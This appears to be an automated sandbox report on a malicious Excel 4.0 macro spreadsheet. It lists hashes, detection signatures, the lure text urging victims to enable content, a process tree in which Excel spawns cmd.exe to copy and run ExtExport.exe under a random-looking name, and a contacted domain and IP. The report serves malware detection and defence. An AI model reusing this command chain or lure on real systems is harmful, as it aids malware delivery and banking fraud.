Loading ...

Play interactive tourEdit tour

Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:document-47-2637.xls
Analysis ID:432941
MD5:92dcc47a1a044fc3a2328ec6eef3918b
SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Checks if browser processes are running
Contains functionality to compare user and computer (likely to detect sandboxes)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6004 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 5080 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nnAzot.exe (PID: 5388 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: CE639EB63B7C1C1EC94651B65CCEC383)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6004, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, ProcessId: 5080

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: document-47-2637.xlsVirustotal: Detection: 26%Perma Link
Source: document-47-2637.xlsMetadefender: Detection: 22%Perma Link
Source: document-47-2637.xlsReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: Binary string: extexport.pdbGCTL source: nnAzot.exe, 00000004.00000002.224789217.0000000000C01000.00000020.00020000.sdmp, nnAzot.exe.2.dr
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.2.dr

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: excel.exeMemory has grown: Private usage: 1MB later: 79MB
Source: global trafficDNS query: name: webhub365.com
Source: global trafficTCP traffic: 192.168.2.3:49716 -> 198.244.146.96:443
Source: global trafficTCP traffic: 192.168.2.3:49716 -> 198.244.146.96:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: webhub365.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.aadrm.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.cortana.ai
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.office.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.onedrive.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://augloop.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cdn.entity.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://clients.config.office.net/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://config.edge.skype.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cortana.ai
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cortana.ai/api
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://cr.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dev.cortana.ai
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://devnull.onenote.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://directory.services.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://graph.windows.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://graph.windows.net/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://lifecycle.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://login.windows.local
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://management.azure.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://management.azure.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://messaging.office.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ncus.contentsync.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://officeapps.live.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://onedrive.live.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://outlook.office.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://outlook.office365.com/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://settings.outlook.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://staging.cortana.ai
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://tasks.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://wus2.contentsync.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6529B5B3-6D5E-4521-86C2-74637D63C046.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.3:49716 version: TLS 1.2

E-Banking Fraud:

barindex
Checks if browser processes are runningShow sources
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, IEXPLORE.EXE
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedge.exe
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgecp.exe
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgesh.exe

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" and then click "Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35
Source: Screenshot number: 4Screenshot OCR: Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ^ V S " a Offic Sheet1
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: document-47-2637.xlsInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: document-47-2637.xlsInitial sample: Sheet size: 14533
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C06EB1
Source: Joe Sandbox ViewDropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 2D2EAD13B2796AD58D070DC1FD36961866F25E1E436661C760A879EAC35982F9
Source: classification engineClassification label: mal84.bank.expl.evad.winXLS@6/8@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{86E1C1D0-EB0C-43A4-B7BA-E0F0BAC366D9} - OProcSessId.datJump to behavior
Source: document-47-2637.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: document-47-2637.xlsVirustotal: Detection: 26%
Source: document-47-2637.xlsMetadefender: Detection: 22%
Source: document-47-2637.xlsReversingLabs: Detection: 15%
